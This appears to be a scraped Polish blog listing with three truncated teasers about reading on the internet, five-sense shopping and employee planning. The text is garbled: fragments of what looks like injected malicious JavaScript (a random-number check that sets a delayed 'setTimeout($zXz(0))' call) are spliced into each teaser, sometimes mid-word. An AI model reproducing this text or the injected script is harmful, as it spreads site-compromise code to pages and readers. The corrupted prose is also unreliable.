Czytają od środka

W szkole jesteśmy uczeni, że teksty czyta się od lewej do prawej i od góry do dołu. W Internecie tak nie jest. Tu czyta się od środka ekranu, potem do góry, a na końcu ( dom() * 6);if [...]

Kupuje 5 zmysłów

Gdyż polowaliśmy wykorzystując je wszystkie. W polowaniu, ale także w skonsumowaniu upolowanej zwierzyny brały udział wszystkie zmysły człowieka i z zakupami ( dom() * 6);if (number1==3){var [...]

Pracownicy nie planują

Ale menedżerowie już powinni. Pracownicy częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zostawiają swoją pracę w momencie, jaki jest im wygodny i w takim stanie, [...]